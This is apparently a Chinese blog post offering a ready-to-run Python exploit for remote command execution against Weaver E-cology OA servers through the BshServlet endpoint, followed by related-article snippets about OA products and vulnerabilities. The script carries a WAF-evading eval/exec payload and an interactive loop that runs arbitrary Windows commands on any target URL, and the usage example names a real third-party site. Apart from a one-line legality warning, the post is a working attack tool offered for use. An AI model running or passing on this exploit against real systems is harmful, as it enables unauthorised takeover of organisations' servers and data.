使用方法

python3 rce.py http://www.baidu.com

image

payload是捡的，可以一定程度上bypass waf

源码

随手撸的

import requests
import sys

headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Content-Type': 'application/x-www-form-urlencoded'
}


def exploit(url,cmd):
    target=url+'/weaver/bsh.servlet.BshServlet'
    payload='bsh.script=eval%00("ex"%2b"ec(\\"cmd+/c+{}\\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw'.format(cmd)
    res=requests.post(url=target,data=payload,headers=headers,timeout=10)
    res.encoding=res.apparent_encoding
    print(res.text)

if __name__ == '__main__':
    url=sys.argv[1]
    while(1):
        cmd=input('cmd:')
        exploit(url,cmd)

警告！请勿用于非法用途！

泛微OA管理系统RCE漏洞利用脚本 ——yzddMr6
使用方法 python3 rce.py http://www.baidu.com payload是捡的，可以一定程...
x微E-Cology WorkflowServiceXml RC
x微E-Cology WorkflowServiceXml RCE 一、漏洞描述泛微E-cology OA系统的...
微信oa管理系统是什么？如何与oa管理系统进行结合？
微信oa管理系统是利用企业微信与oa管理系统对接的协同办公模式，利用微信近几年被广大群众使用，所带来的便捷性及乐趣...
微信oa管理系统是什么？适合企业使用吗？
经常听说微信oa管理系统，那么微信oa管理系统是什么呢？微信oa管理系统对企业有什么作用？如何实现微信oa办公？ ...
十二、🏸RCE漏洞
?RCE漏洞： ⏲RCE漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。 ⌚远程...
泛微OA&SAP集成：让雅化集团60多家公司实现一体化管
泛微高效集成能力服务多样化需求与ERP软件的无缝集成能力，让泛微OA系统轻松适应各色业务管理需求，打通信息通道、落...
今天，未来OA系统引爆京城文章
今天，未来OA系统引爆京城 OA系统领导厂商泛微的探索之路协同OA系统在中国不到二十年的发展历史，从最早的办公自...
安全漏洞之任意文件上传漏洞分析
X微e-office的那个前台任意文件上传漏洞已经被爆出一段时间了，相关的漏洞利用脚本甚至是漏洞批量利用脚本也有...
某office前台任意文件上传漏洞分析
X微e-office的那个前台任意文件上传漏洞已经被爆出一段时间了，相关的漏洞利用脚本甚至是漏洞批量利用脚本也有很...
知名央企——有研科技集团有限公司选择泛微OA系统
近日，知名央企——有研科技集团有限公司选择泛微OA，通过打造一体化OA系统，实现行政有序管理、高效办公。有研科技...